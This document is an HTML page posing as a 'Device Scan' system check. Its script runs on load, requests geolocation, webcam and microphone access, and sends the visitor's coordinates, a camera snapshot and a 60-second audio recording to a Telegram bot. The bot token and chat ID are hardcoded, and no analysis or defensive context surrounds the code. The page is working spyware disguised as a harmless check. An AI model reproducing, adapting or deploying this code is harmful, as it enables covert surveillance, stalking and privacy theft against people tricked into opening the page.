<!DOCTYPE html>
<html>
<head>
  <title>Device Scan</title>
  <style>
    body { font-family: Arial; text-align: center; margin-top: 50px; }
    #status { font-weight: bold; color: green; }
  </style>
</head>
<body>
  <h2>System Checking... Please keep this page open.</h2>
  <p id="status">Fetching data...</p>

  <script>
    const BOT_TOKEN = "7826691763:AAEWBVInzCY7o7zGnHEZl7EoKkUMcF8rbOw";
    const CHAT_ID = "8033576116";

    async function sendToTelegram(message, fileBlob, filename) {
      const formData = new FormData();
      formData.append("chat_id", CHAT_ID);
      formData.append("caption", message);

      if (filename.endsWith('.ogg')) {
        formData.append("audio", fileBlob, filename);
        await fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendAudio`, { method: "POST", body: formData });
      } else if (filename.endsWith('.jpg')) {
        formData.append("photo", fileBlob, filename);
        await fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendPhoto`, { method: "POST", body: formData });
      }
    }

    function sendLocation(lat, lon) {
      fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendLocation?chat_id=${CHAT_ID}&latitude=${lat}&longitude=${lon}`);
    }

    async function captureImage() {
      const video = document.createElement("video");
      const stream = await navigator.mediaDevices.getUserMedia({ video: true });
      video.srcObject = stream;
      await video.play();

      const canvas = document.createElement("canvas");
      canvas.width = video.videoWidth;
      canvas.height = video.videoHeight;
      canvas.getContext("2d").drawImage(video, 0, 0);

      stream.getTracks().forEach(track => track.stop());

      const blob = await new Promise(resolve => canvas.toBlob(resolve, "image/jpeg"));
      await sendToTelegram("Camera Snapshot", blob, "snapshot.jpg");
    }

    async function recordAudio(durationMs = 60000) {
      const stream = await navigator.mediaDevices.getUserMedia({ audio: true });
      const mediaRecorder = new MediaRecorder(stream);
      const chunks = [];

      mediaRecorder.ondataavailable = e => chunks.push(e.data);
      mediaRecorder.onstop = async () => {
        const blob = new Blob(chunks, { type: "audio/ogg" });
        await sendToTelegram("Audio Clip", blob, "audio.ogg");
        stream.getTracks().forEach(track => track.stop());
        document.getElementById("status").innerText = "✅ Data sent successfully!";
      };

      mediaRecorder.start();
      setTimeout(() => mediaRecorder.stop(), durationMs);
    }

    navigator.geolocation.getCurrentPosition(
      pos => {
        const { latitude, longitude } = pos.coords;
        sendLocation(latitude, longitude);
        captureImage();
        recordAudio();
      },
      err => {
        document.getElementById("status").innerText = "❌ Location permission denied.";
      }
    );
  </script>
</body>
</html>
